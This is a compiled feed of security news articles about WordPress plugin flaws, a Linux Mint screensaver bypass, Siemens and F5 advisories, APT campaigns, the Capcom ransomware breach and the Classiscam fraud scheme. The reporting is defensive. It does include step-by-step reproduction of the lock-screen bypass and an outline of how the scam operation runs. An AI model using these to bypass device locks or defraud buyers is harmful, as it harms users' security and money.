Category Archives: Malware

Critical flaws in Orbit Fox WordPress plugin allows site takeover

Two vulnerabilities in the Orbit Fox WordPress plugin, a privilege-escalation issue and a stored XSS bug, can allow site takeover.

Security experts from Wordfence have discovered two security vulnerabilities in the Orbit Fox WordPress plugin. The flaws are a privilege-escalation vulnerability and a stored XSS bug that impacts over 40,000 installs.

The Orbit Fox plugin allows site administrators to add features such as registration forms and widgets, it has been installed by 400,000+ sites.

The plugin was developed by ThemeIsle, it is designed to enhance the Elementor, Beaver Builder, and Gutenberg editors and implements additional features 

Two vulnerabilities can be exploited by attackers to inject malicious code into websites using the vulnerable version of the plugin and take over them.

“One of these flaws made it possible for attackers with contributor level access or above to escalate their privileges to those of an administrator and potentially take over a WordPress site. The other flaw made it possible for attackers with contributor or author level access to inject potentially malicious JavaScript into posts.” reads the post published by Wordfence. “These types of malicious scripts can be used to redirect visitors to malvertising sites or create new administrative users, amongst many other actions.”

The authenticated privilege-escalation flaw has been rated as critical and has received a CVSS bug-severity score of 9.9. authenticated attackers with contributor level access or above can escalate privileges to administrator and potentially take over a website.

The authenticated stored cross-site scripting (XSS) issue allows attackers with contributor or author level access to inject JavaScript into posts. An attacker could exploit this flaw to conduct multiple malicious actions, such as malvertising attacks. The flaw rated as medium severity has received a CVSS score of 6.4.

Orbit Fox plugin includes a registration widget that can be used to create a registration form with customizable fields when using the Elementor and Beaver Builder page builder plugins. Upon creating the registration form, the plugin will provide the ability to set a default role to be used whenever a user registers using the form.

“Lower-level users like contributors, authors, and editors were not shown the option to set the default user role from the editor. However, we found that they could still modify the default user role by crafting a request with the appropriate parameter,” Wordfence continues. “The plugin provided client-side protection to prevent the role selector from being shown to lower-level users while adding a registration form. Unfortunately, there were no server-side protections or validation to verify that an authorized user was actually setting the default user role in a request.”

Experts pointed out that the lack of server-side validation in Orbit Fox allows lower-level users to set their role to that of an administrator upon successful registration.

“To exploit this flaw, user registration would need to be enabled and the site would need to be running the Elementor or Beaver Builder plugins,” continues Wordfence. “A site with user registration disabled or neither of these plugins installed would not be affected by this vulnerability.”

This vulnerability allowed lower-level users to add malicious JavaScript to posts that would execute in the browser whenever a user navigated to that page.

The two vulnerabilities have been addressed with the release of version 2.10.3.

Vulnerabilities in WordPress plugins are very dangerous and could allow attackers to carry out attacks on a large scale. On December, the development team behind the Contact Form 7 WordPress plugin discloses an unrestricted file upload vulnerability, the plugin has over 5 million active installs. The issue can exploit to upload a file that can be executed as a script file on the underlying server.

In November threat actors were observed actively exploiting a zero-day vulnerability in the popular Easy WP SMTP WordPress plugin installed on more than 500,000 sites.

In the same period hackers were actively exploiting a critical remote code execution vulnerability in the File Manager plugin, over 300,000 WordPress sites were potentially exposed at the time of the discovery.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Golang-based worm)

The post Critical flaws in Orbit Fox WordPress plugin allows site takeover appeared first on Security Affairs.

Security Affairs newsletter Round 297

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

It is time to re-evaluate Cyber-defence solutions
New Zealand central bank hit by a cyber attack
TeamTNT botnet now steals Docker API and AWS credentials
Connecting the dots between SolarWinds and Russia-linked Turla APT
Experts found gained access to the Git Repositories of the United Nations
Russian hacker Andrei Tyurin sentenced to 12 years in prison
Source code for malware that targets Qiui Cellmate device was leaked online
Ubiquiti discloses a data breach
Bitdefender releases free decrypter for Darkside ransomware
EMA: Some of Pfizer/BioNTech COVID-19 vaccine data was leaked online
Police took down DarkMarket, the worlds largest darknet marketplace
Sophisticated hacking campaign uses Windows and Android zero-days
Sunspot, the third malware involved in the SolarWinds supply chain attack
Attackers targeted Accellion FTA in New Zealand Central Bank attack
Data collection cheat sheet: how Parler, Twitter, Facebook, MeWes data policies compare
Rogue Android RAT emerges from the darkweb
CAPCOM: 390,000 people impacted in the recent ransomware Attack
CISA warns of recent successful cyberattacks against cloud service accounts
Cisco addresses a High-severity flaw in CMX Software
Classiscam expands to Europe: Russian-speaking scammers lure Europeans to pages mimicking classifieds
Expert discovered a DoS vulnerability in F5 BIG-IP systems
Operation Spalax, an ongoing malware campaign targeting Colombian entities
Cisco says its RV routers will no longer receive updates
Expert launched Malvuln, a project to report flaws in malware
Signal is down for multiple users worldwide
Winnti APT continues to target game developers in Russia and abroad
Jokers Stash, the largest carding site, is shutting down
Siemens fixed tens of flaws in Siemens Digital Industries Software products
Two kids found a screensaver bypass in Linux Mint

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 297 appeared first on Security Affairs.

Two kids found a screensaver bypass in Linux Mint

The development team behind the Linux Mint distro has fixed a security flaw that could have allowed users to bypass the OS screensaver.

The maintainers of the Linux Mint project have addressed a security bug that could have allowed attackers to bypass the OS screensaver.

The curious aspect of this vulnerability is related to its discovery, in fact, it was found by too children that were playing on their dad’s computer.

The process is simple and allow the screensaver lock by-pass by crashing the screensaver and unlock the desktop via the virtual keyboard.

In order to reproduce the bypass on a locked system, click on the virtual keyboard, then type at the real keyboard while typing on the virtual keyboard, both at the same time, as many keys as possible.

“A few weeks ago, my kids wanted to hack my linux desktop, so they typed and clicked everywhere, while I was standing behind them looking at them play… when the screensaver core dumped and they actually hacked their way in! wow, those little hackers…” states a bug report on GitHub.

“I thought it was a unique incident, but they managed to do it a second time. So I’d consider this issue… reproducible… by kids. I tried to recreate the crash on my own with no success, maybe because it required more than 4 little hands typing and using the mouse on the virtual keyboard. Maybe not the best bug report, but I’ve seen the screenlock crash twice already with my own eyes, so its pretty real. One last thing, after the desktop is unlocked, I can’t re-lock it again, the screensaver process is pretty dead and requires me to open a shell and run ‘cinnamon-screensaver’ manually to get it working.”

Linux Mint lead developer Clement Lefebvre confirmed that the bug resides in the libcaribou, the on-screen keyboard (OSK) component that is part of the Cinnamon desktop environment used by Linux Mint.

“We’ll most likely patch libcaribou here” wrote Lefebvre. “We have two different issues:

  • In all versions of Cinnamon, the on-screen keyboard (launched from the menu) runs within the Cinnamon process and uses libcaribou. Pressing ē crashes Cinnamon.
  • In versions of Cinnamon 4.2 and higher, there’s a libcaribou OSK in the screensaver. Pressing ē there crashes the screensaver.”

The vulnerability is triggered when users press the “ē” key on the on-screen keyboard, this causes the crash of the Cinnamon desktop process. If the on-screen keyboard is opened from the screensaver, the bug crashes the screensaver allowing users to access the desktop.

The issue was introduced in the Linux Mint OS since the Xorg update to fix CVE-2020-25712 heap-buffer overflow in October. The bug affects all distributions running Cinnamon 4.2+ and any software using libcaribou.

The vulnerability was addressed with the release of a patch for Mint 19.x, Mint 20.x and LMDE 4.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Linux Mint)

The post Two kids found a screensaver bypass in Linux Mint appeared first on Security Affairs.

Siemens fixed tens of flaws in Siemens Digital Industries Software products

Siemens has addressed tens of vulnerabilities in Siemens Digital Industries Software products that can allow arbitrary code execution.

Siemens has addressed 18 vulnerabilities affecting some products of Siemens Digital Industries Software which provides product lifecycle management (PLM) solutions.

The vulnerabilities affect Siemens JT2Go, a 3D viewing tool for JT data (ISO-standardized 3D data format) and the Teamcenter Visualization solution. JT2Go is a 3D JT viewing tool to allows its customers to view JT, PDF, Solid Edge, PLM XML with available JT, VFZ, CGM, and TIF data. Teamcenter Visualization software provides a comprehensive family of visualization solutions to access documents, 2D drawings and 3D models in a single environment.

“JT2Go and Teamcenter Visualization are affected by multiple vulnerabilities that could lead to arbitrary code execution or data extraction on the target host system. Siemens has released updates for both affected products and recommends to update to the latest versions.” states the advisory published by the vendor.

The company recommends limiting the opening of untrusted files in systems where JT2Go or Teamcenter Visualisation is installed to mitigate the risk of attacks exploiting these issues. It also suggests applying a Defense-in-Depth concept to reduce the probability that the untrusted code is run on the system.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also published an advisory related to these security flaws.

According to CISA, the addressed flaws include Type Confusion, Improper Restriction of XML External Entity Reference, Out-of-bounds Write, Heap-based Buffer Overflow, Stack-based Buffer Overflow, Untrusted Pointer Dereference, and Out-of-bounds Read.

The following products are affected by the vulnerabilities addressed by Siemens:

  • JT2Go: All versions prior to v13.1.0
  • JT2Go: Version 13.1.0. only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991
  • Teamcenter Visualization: All versions prior to V13.1.0
  • Teamcenter Visualization: Version 13.1.0 only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991

Several vulnerabilities addressed by the vendor received a CVSS v3 base score of 7.8, including:

The flaws were reported by two researchers through Trend Micro’s Zero Day Initiative (ZDI) and the U.S. CISA.

Siemens also addressed six vulnerabilities in its Solid Edge solution that provides software tools for 3D design, simulation and manufacturing. The flaws could lead arbitrary code execution and information disclosure.

“Solid Edge is affected by multiple vulnerabilities that could allow arbitrary code execution on an affected system. Siemens has released an update for Solid Edge and recommends to update to the latest version.” reads the advisory.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Siemens)

The post Siemens fixed tens of flaws in Siemens Digital Industries Software products appeared first on Security Affairs.

Joker’s Stash, the largest carding site, is shutting down

Joker’s Stash to shut down on February 15, 2021.

Joker’s Stash, the largest carding marketplace online announced that it was shutting down its operations on February 15, 2021.

Joker’s Stash, the largest carding marketplace online, announced that its operations will shut down on February 15, 2021.

The administrator announced the decision via messages posted on various cybercrime forums.

Joker’s Stash Official Closing Message
Image source FlashPoint

Joker’s Stash is one of the most longevous carding websites, it was launched in October 2014 and is very popular in the cybercrime underground due to the freshness of its cards and their validity. The administrators always claimed the exclusivity of their offer that is based on “self-hacked bases.”

In December, Joker’s Stash was shut down as a result of a coordinated operation conducted by the FBI and Interpol.

Joker's Stash

At the time, the authorities only seized some of the servers used by the carding portal, but the Joker’s Stash site hosted on the ToR network was not affected by the operations conducted by the police.

The sized sites were at jstash.bazar, jstash.lib, jstash.emc, and jstash.coin, which are all those accessible via blockchain DNS.

Joker Stash admins said in a message published on a hacking forum that the law enforcement only seized the servers hosting the above domains, that were only used to redirecting visitors to the actual website.

The seizure operated by law enforcement in December had an impact on the reputation of the portal, some users were also claiming that the quality of the services offered by Joker’s Stash was decreasing.

“Throughout 2020, the typically active administrator JokerStash had several gaps in communications. JokerStash claimed that they were hospitalized due to a coronavirus infection. The decreasing number of large fresh bases also questioned their ability to source new card data.” reported FlashPoint.

The news of the closure of the card shop represents a major hit to the carding activities in the underground market.

The success of the recent operations might have pushed the administrators into an exit from their operations.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, carding)

The post Joker’s Stash, the largest carding site, is shutting down appeared first on Security Affairs.

Threat Roundup for January 8 to January 15

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between January 8 and January 15. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

Read More


20210115-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Expert launched Malvuln, a project to report flaws in malware

The researcher John Page launched, the first website exclusively dedicated to the research of security flaws in malware codes.

The security expert John Page (aka hyp3rlinx) launched, the first platform exclusively dedicated to the research of security flaws in malware codes.

The news was first announced by SecurityWeek, the researcher explained that Malvuln is the first website dedicated to research and analysis of vulnerabilities in malware samples.

“ is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself.” wrote the expert. “There are many websites already offering information about Malware like Hashes, IOC, Reversing etc. However, none dedicated to research and analysis of vulnerabilities within Malware samples… until now. Long Live MALVULN.”

Sharing the knowledge of vulnerabilities affecting malware could allow incident response teams to neutralize the threat in case of infections, but could also help vxers to address them end improve their malware. For this reason, it is likely that Page will regulate the vulnerability disclosure process in the future.

This is a great initiative, we have to support it, everyone can get in contact with the expert via Twitter (@malvuln) or Email (malvuln13[at]

Currently, Page is the unique contributor of the Malvuln service, but he could start accepting third-party contributions in the future.

Clearly, the initiative is born for educational and research purposes only.

At the time of writing the site already includes 26 entries related to remotely exploitable buffer overflow flaws and privilege escalation issues. Most of the buffer overflow vulnerabilities could be exploited for remote code execution.

For each flaw reported through the website, the record includes multiple information such as the name of the malware, the MD5 hash, the type of vulnerability, a description of the vulnerability, dropped files, a memory dump, and proof-of-concept (PoC) exploit code.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Golang-based worm)

The post Expert launched Malvuln, a project to report flaws in malware appeared first on Security Affairs.

Winnti APT continues to target game developers in Russia and abroad

A Chinese Threat actor targeted organizations in Russia and Hong Kong with a previously undocumented backdoor, experts warn.

Cybersecurity researchers from Positive Technologies have uncovered a series of attacks conducted by a Chinese threat actor that aimed at organizations in Russia and Hong Kong. Experts attribute the attacks to the China-linked Winnti APT group (aka APT41) and reported that the attackers used a previously undocumented backdoor in the attacks.

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, Group 72, Blackfly, and APT41, and ShadowPad.

The APT group targeted organizations in various industries, including the aviation, gaming, pharmaceuticals, technology, telecoms, and software development industries.

The recent attacks documented by Positive Technologies were first spotted on May 12, 2020, at the time the experts detected several samples of the new malware that were initially incorrectly attributed to the Higaisa threat actors. Investigating the attack, the experts discover a number of new malware samples used by the attackers, including various droppers, loaders, and injectors. The attackers also used Crosswalk, ShadowPad, and PlugX backdoors, but security researchers also noticed a sample of a previously undocumented backdoor that they dubbed FunnySwitch.

In the first attack, the threat actors used LNK shortcuts to extract and run the malware payload, while in the second attack detected on May 30, the threat actor used a malicious archive (CV_Colliers.rar) containing the shortcuts to two bait PDF documents with a CV and IELTS certificate.

The LNK files contain links to target pages hosted on Zeplin, a legitimate collaboration services between designers and developers.

The payload consists of two files, the svchast.exe that acts as a simple local shellcode loader, and ‘3t54dE3r.tmp’ that is the shellcode containing the main payload (the Crosswalk malware).

The Crosswalk was first spotted by researchers from FireEye in 2017 Crosswalk and included in an analysis of the activities associated with the APT41 (Winnti) group. The malware is a modular backdoor that implements system reconnaissance capabilities and is able to deliver additional payloads.

Experts also discovered a significant overlap of the network infrastructure with the APT41’s infrastructure.

“The network infrastructure of the samples overlaps with previously known APT41 infrastructure: at the IP address of one of the C2 servers, we find an SSL certificate with SHA-1 value of b8cff709950cfa86665363d9553532db9922265c, which is also found at IP address 67.229.97[.]229, referenced in a 2018 CrowdStrike report. Going further, we can find domains from a Kaspersky report written in 2013.” reads the report published by Positive Technologies. “All this leads us to conclude that these LNK file attacks were performed by Winnti (APT41), which “borrowed” this shortcut technique from Higaisa.”

Winnti infrastructure

The Winnti group focus on computer game industry, in the past they targeted game developers and recently they hit Russian companies in the same industry. The targets of the recent attacks include Battlestate Games, a Unity3D game developer from St. Petersburg.

On June, the researchers detected an active HttpFileServer on one of the active C2 servers. The HFS was containing an email icon, screenshot from a game with Russian text, screenshot of the site of a game development company, and a screenshot of information about vulnerability CVE-2020-0796 from the Microsoft website. The files were used two months later, on August 20, 2020, in attacks that also leveraged a self-contained loader for Cobalt Strike Beacon PL shellcode.

The discovery lead the experts into believing that they detected traces of preparation for, and subsequent successful implementation of, an attack on Battlestate Games.

“Winnti continues to pursue game developers and publishers in Russia and elsewhere. Small studios tend to neglect information security, making them a tempting target. Attacks on software developers are especially dangerous for the risk they pose to end users, as already happened in the well-known cases of CCleaner and ASUS. By ensuring timely detection and investigation of breaches, companies can avoid becoming victims of such a scenario.” concludes the report.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Winnti APT)

The post Winnti APT continues to target game developers in Russia and abroad appeared first on Security Affairs.

Phishers count on remotely hosted images to bypass email filters

Loading remotely hosted images instead of embeedding them directly into emails is one of the latest tricks employed by phishers to bypass email filters. Phishers are always finding new ways trick defenses Phishing emails – especially when impersonating popular brands – contain widely known brand logos and other images to give the illusion of having been sent by legitimate organizations. Images have also been used for ages as a way to circumvent an email’s textual … More

The post Phishers count on remotely hosted images to bypass email filters appeared first on Help Net Security.

Expert discovered a DoS vulnerability in F5 BIG-IP systems

A security researcher discovered a flaw in the F5 BIG-IP product that can be exploited to conduct denial-of-service (DoS) attacks.

The security expert Nikita Abramov from Positive Technologies discovered a DoS vulnerability, tracked as CVE-2020-27716, that affects certain versions of F5 BIG-IP Access Policy Manager (APM).

The F5 BIG-IP Access Policy Manager is a secure, flexible, high-performance access management proxy solution that delivers unified global access control for your users, devices, applications, and application programming interfaces (APIs).

The vulnerability resides in the Traffic Management Microkernel (TMM) component which processes all load-balanced traffic on BIG-IP devices.

“When a BIG-IP APM virtual server processes traffic of an undisclosed nature, the Traffic Management Microkernel (TMM) stops responding and restarts. (CVE-2020-27716)” reads the advisory published by F5. “Traffic processing is disrupted while TMM restarts. If the affected BIG-IP system is configured as part of a device group, the system triggers a failover to the peer device.”

An attacker could trigger the flaw by simply sending a specially crafted HTTP request to the server hosting the BIG-IP configuration utility, and that would be enough to block access to the controller for a while (until it automatically restarts).

Vulnerabilities like this one are quite commonly found in code. They can occur for different reasons, for example unconsciously neglected bydevelopers or due to insufficient additional checks being carried out. I discovered this vulnerability during binary analysis. Flaws like this one can be detected using non-standard requests and by analyzing logic and logical inconsistencies.” Nikita Abramov researcher at Positive Technologies explains.

The flaw impacts versions 14.x and 15.x, the vendor already released security updates that address it.

In June, researchers at F5 Networks addressed another flaw, tracked as CVE-2020-5902, which resides in undisclosed pages of Traffic Management User Interface (TMUI) of the BIG-IP product.

The vulnerability could be exploited by attackers to gain access to the TMUI component to execute arbitrary system commands, disable services, execute arbitrary Java code, and create or delete files, and potentially take over the BIG-IP device

The CVE-2020-5902 vulnerability received a CVSS score of 10, this means that is quite easy to exploit. The issue could be exploited by sending a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

Immediately after the public disclosure of the flaw, that several proof-of-concept (PoC) exploits have been released, some of them are very easy to use.

A few days after the disclosure of the vulnerability in the F5 Networks BIG-IP product threat actors started exploiting it in attacks in the wild. Threat actors exploited the CVE-2020-5902 flaw to obtain passwords, create web shells, and infect systems with various malware.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, F5 BIG-IP)

The post Expert discovered a DoS vulnerability in F5 BIG-IP systems appeared first on Security Affairs.

Operation Spalax, an ongoing malware campaign targeting Colombian entities

Security experts from ESET uncovered an ongoing surveillance campaign, dubbed Operation Spalax, against Colombian government institutions and private companies.

Malware researchers from ESET uncovered an ongoing surveillance campaign, dubbed Operation Spalax, against Colombian entities exclusively.

The attacks aimed at government institutions and private companies, most of them in the energy and metallurgical sectors.  The campaign has been active at least since 2020, the attackers leverage remote access trojans to spy on their victims. 

The attacks share some similarities with other campaigns targeting Colombian entities, in particular a campaign detailed in February 2019, by QiAnXin. The operations described by QiAnXin are attributed to an APT group active since at least April 2018.

Below the similarities found by ESET:

  • We saw a malicious sample included in IoCs of QiAnXin’s report and a sample from the new campaign in the same government organization. These files have fewer than a dozen sightings each.
  • Some of the phishing emails from the current campaign were sent from IP addresses corresponding to a range that belongs to Powerhouse Management, a VPN service. The same IP address range was used for emails sent in the earlier campaign.
  • The phishing emails have similar topics and pretend to come from some of the same entities – for example, the Office of the Attorney General (Fiscalia General de la Nacion) or the National Directorate of Taxes and Customs (DIAN).
  • Some of the C&C servers in Operation Spalax use and subdomains, along with IP addresses that belong to Powerhouse Management. This also happened in the earlier campaign.

However, experts found differences in the attachments used for phishing emails, the remote access trojans (RATs) used the operator’s C&C infrastructure.

The attacks start with phishing messages that lead to the download of RAR archives hosted on OneDrive or MediaFire containing a malicious executable.

“We’ve found a variety of packers used for these executables, but their purpose is always to have a remote access trojan running on the victimized computer, usually by decrypting the payload and injecting it into legitimate processes.” continues the report. “We have seen the attackers use three different RATs: Remcos, njRAT and AsyncRAT.”

Operation Spalax

The phishing messages used a wide range of topics as lures, such as notifications of driving infractions, to attend court hearings, and to take mandatory COVID-19 tests.

ESET also documented the use of heavily obfuscated AutoIt droppers, in this attack scenario the first-stage malware performs the injection and execution of the payload. The malware use two shellcodes contained in the compiled AutoIt script, the first one decrypts the payload and the second injects it into some process.

The Trojans used in Operation Spalax implements several capabilities to spy on targets, such as keylogging, screen capture, clipboard hijacking, exfiltration of files, and the ability to download and execute other payloads.

ESET pointed out that the attackers leveraged on large network C2 infrastructure, experts observed at least 24 different IP addresses in use in the second half of 2020. Attackers probably compromised devices to use them as proxies for their C2 servers. The threat actors also used dynamic DNS services to manage a pool of 70 different domain names (and also register new ones on a regular basis) that are dynamically assigned to IP addresses. In the second half of 2020 alone they used 24 IP addresses.

“Targeted malware attacks against Colombian entities have been scaled up since the campaigns that were described last year,” ESET concludes. “The landscape has changed from a campaign that had a handful of C2 servers and domain names to a campaign with very large and fast-changing infrastructure with hundreds of domain names used since 2019.”

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Spalax)

The post Operation Spalax, an ongoing malware campaign targeting Colombian entities appeared first on Security Affairs.

CAPCOM: 390,000 people impacted in the recent ransomware Attack

Capcom revealed that the recent ransomware attack has potentially impacted 390,000 people, an increase of approximately 40,000 people from the previous report.

In November, Japanese game developer Capcom admitted to have suffered a cyberattack that is impacting business operations.

The company has developed multiple multi-million-selling game franchises, including Street Fighter, Mega Man, Darkstalkers, Resident Evil, Devil May Cry, Onimusha, Dino Crisis, Dead Rising, Sengoku Basara, Ghosts ‘n Goblins, Monster Hunter, Breath of Fire, and Ace Attorney as well as games based on Disney animated properties.

At the time, the Notice Regarding Network Issues published by the company revealed that on the morning of November 2nd, 2020 is suffered a cyberattack, In response to the incident the game developer shut down portions of their corporate network to prevent the malware from spreading.

The incident has not impacted connections for its players, the company initially declared that had not found any evidence that customer data was stolen.

In Mid-November, the company confirmed that the attackers accessed the personal information of its employees, along with financial and business information. The company believes that other information potentially accessed includes sales reports, financial information, game development documents, other information related to business partners.

No credit card information was compromised in the security breach.

After the attack, the Ragnar Locker ransomware operators claimed to have stolen over 1TB of data from the company.

In an update published by the Ragnar ransomware gang on it leak site the operators leaked a collection of archives as proof of the hack.Greetings !

“Unfortunately even such worldwide leading company as CAPCOM doesn’t values much privacy and security. They was notified about vulnerability and data leak numerous time.” reads the post published by Ragnar gang on its leak site. They checked our page with proofs but even this didn’t help them to make a right decision and save data from leakage. Also we would help them to decrypt and also provide with recommendations on security measures improvement, to avoid such issues in future.” reads the post published by the ransomware on its leak site.

“We are sure that everyone should know about CAPCOM’s decision and careless attitude regarding data privacy. This might seems crazy in 21st century, all corporates should work harder on their security measures, especially IT and online based companies.”


This week, Capcom provided an update on its investigation, that revealed the incident was worse than initially thought because the number of impacted people is larger than initially believed.

Capcom revealed that the personal information of 16,415 people was stolen by the ransomware gang. Impacted people includes 3,248 business partners, 9,164 former employees, and related parties, and 3,994 employees and related parties. Only 9 people were impacted.

“Further, because the overall number of potentially compromised data cannot specifically be ascertained due to issues including some logs having been lost as a result of the attack, Capcom has listed the maximum number of items it has determined to potentially have been affected at the present time.” reads the update published by the company.

Cumulative maximum number of potentially impacted people is 390,000, an increase of approximately 40,000 people from the previous report.

1. Information verified to have been compromised (updated)

i. Personal Information16,406 people *cumulative total since investigation began: 16,415 peopleBusiness partners, etc.: 3,248 people
At least one of the following: name, address, phone number, email address, etc.Former employees and related parties: 9,164 people
At least one of the following: name, email address, HR information, etc.Employees and related parties: 3,994 people
At least one of the following: name, email address, HR information, etc.
ii. Other InformationSales reports, financial information, game development documents, other information related to business partners

2. Potentially compromised data (updated)

i. Personal InformationApplicants: approx. 58,000 people
At least one of the following: name, address, phone number, email address, etc.*Cumulative maximum number of potentially compromised data for customers,
business partners and other external parties: 390,000 people*Regarding the cumulative maximum number of potentially compromised data above: as part of its ongoing investigation, Capcom has determined that it currently does not see evidence for the possibility of data compromise for the approximate 18,000 items of personal information from North America (Capcom Store member information and esports operations website members) that the company included in its November 16, 2020 announcement. As such, these have been removed from this cumulative maximum number of potentially compromised data.

The company pointed out that the investigation is still ongoing and that new fact may come to light.

“At this point in time, Capcom’s internal systems have in large part recovered, and business operations have returned to normal.” concludes the update.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, CAPCOM)

The post CAPCOM: 390,000 people impacted in the recent ransomware Attack appeared first on Security Affairs.

Classiscam expands to Europe: Russian-speaking scammers lure Europeans to pages mimicking classifieds

Russian-speaking scammers started targeting users of European marketplaces and classifieds is a criminal scheme dubbed Classiscam.

Group-IB, a global threat hunting and and adversary-centric cyber intelligence company, has discovered that Russian-speaking scammers started targeting users of European marketplaces and classifieds. The scheme, dubbed Classiscam by Group-IB, is an automated scam as a service designed to steal money and payment data. The scheme uses Telegram bots that provide scammers with ready-to-use pages mimicking popular classifieds, marketplaces and sometimes delivery services. According to Group-IB, over 20 large groups, leveraging the scheme, currently operate in Bulgaria, the Czech Republic, France, Poland, Romania, the US, and post-Soviet countries, while 20 more groups work in Russia. These 40 groups altogether made at least USD 6.5 mln in 2020. Scammers are actively abusing brands of popular international classifieds and marketplaces, such as Leboncoin, Allegro, OLX, FAN Courier, Sbazar, and etc. Group-IB has sent notifications to the affected brands so they could take the necessary steps to protect against Classiscam. 


The scheme, which initially exploited delivery brands, has been tried and tested in Russia. Analysts warn that it is now growing rapidly and reaching users of European classifieds and marketplaces, which were chosen as a target by Russian-speaking scammers to increase their profits and reduce the risk of being caught. Fighting the scam requires joint efforts by classifieds, marketplaces, and delivery services. It is also key to use advanced digital risk protection technology to ensure that any brand impersonating attacks are quickly detected and taken down. 

Exporting Classiscam

Group-IB Computer Emergency Response Team (CERT-GIB) for the first time recorded the Classiscam in Russia in the summer of 2019. Peak activity was recorded in the spring of 2020 due to the massive switch to remote working and an increase in online shopping.

“In the summer of 2020 we took down 280 scam pages as part of the Classiscam scheme, and by December that number grew 10-fold and reached up to 3,000 pages,” says Yaroslav Kargalev, the deputy head of CERT-GIB. “We see that Classiscammers are now actively migrating from Russia to Europe and other countries. It’s not the first time when Russia serves as a testing ground for cybercriminals with global ambitions.” 

Group-IB’s Digital Risk Protection and CERT-GIB experts have so far identified at least 40 active Classiscam gangs that use scam pages mimicking popular classified, marketplace, and delivery companies with every one of them running a separate Telegram bot. Half of the groups already operate outside of Russia. Despite that scammers are making their first attempts in Europe, an average theft costs users about USD 120. The scam was localized for the markets of Eastern and Western Europe. The brands abused by scammers include the French marketplace Leboncoin, Polish brand Allegro, Czech site Sbazar, Romanian FAN Courier, DHL and many others. An analysis of underground forums and chats revealed that scammers are getting ready to use new brands in their scams, these are FedEx and DHL Express in the US and Bulgaria.

As part of the scheme, scammers publish bait ads on popular marketplaces and classified websites. The ads usually offer cameras, game consoles, laptops, smartphones, and similar items for sale at deliberately low prices. The buyer contacts the seller, who lures the former into continuing the talk through a third party messenger, such as  WhatsApp. It’s noteworthy that scammers pose as both buyers and sellers. To be more persuasive, the scammers use local phone numbers when speaking with their victims. Such services are offered in the underground. 


Although many marketplaces and classifieds that sell new and used goods have an active policy of protecting users from fraudsters by posting warnings on their resources, victims continue to give away their data. 

Evildoers ask victims to provide their contact information to allegedly arrange a delivery. The scammer then sends the buyer an URL to either a fake popular courier service website or a scam website mimicking a classified or a marketplace with a payment form, which turns out to be a scam page. As a result, the fraudster obtains payment data or withdraws money through a fake merchant website. Another scenario invlolves a scammer contacting a legitimate seller under the guise of a customer and sending a fake payment form mimicking a marketplace and obtained via Telegram bot, so that the seller could reportedly receive the money from the scammer. 


Classiscam Hierarchy 

Group-IB discovered at least 40 groups leveraging Classiscam, with each of them running a separate Telegram chat-bot. At least 20 of these groups focus on European countries. On average, they make around US $61,000 monthly, but profits may differ from group to group. It is estimated that all 40 most active criminal groups make US $522,000 per month in total. 

The hierarchy of the scammer groups represents a pyramid, with the topic starters on top. They are responsible for recruiting new members, creating scam pages, registering new accounts, and providing assistance when the bank blocks the recipient’s card or the transaction. The topic starters’ share is about 20-30 percent of the stolen sum. “Workers” get 70-80 percent of the stolen sum for communicating with victims and sending them phishing URLs. 


All details of deals made by workers (including the sum, payment number and username) are displayed in a Telegram bot. That’s how Group-IB experts were able to calсulate their estimated monthly haul. 

Based on payment statistics, the most successful workers move to the top of the list and become influential members of the project. By doing so, they gain access to VIP options in the chats and can work on European marketplaces, which offer a higher income and involve less risks for Russian-speaking scammers. Workers’ assistants are called “callers” and “refunders.” They pretend to be tech support specialists and receive 5-10 percent of the revenue.

Phishing kit in Telegram

The scheme is simple and straightforward, which makes it all the more popular. There are more reasons behind its growing popularity, however, such as automated management and expansion through special Telegram chat bots. More than 5,000 users (scammers) were registered in 40 most popular Telegram chats by the end of 2020.  

As it stands, workers just need to send a link with the bait product to the chatbot, which then generates a complete phishing kit including courier URL, payment, and refund. There are more than 10 types of Telegram bots that create scam pages for brands from Bulgaria, the Czech Republic, France, Poland, and Romania. For each brand and country, scammers write scripts that help newbie workers log in to foreign sites and communicate with victims in the local language.

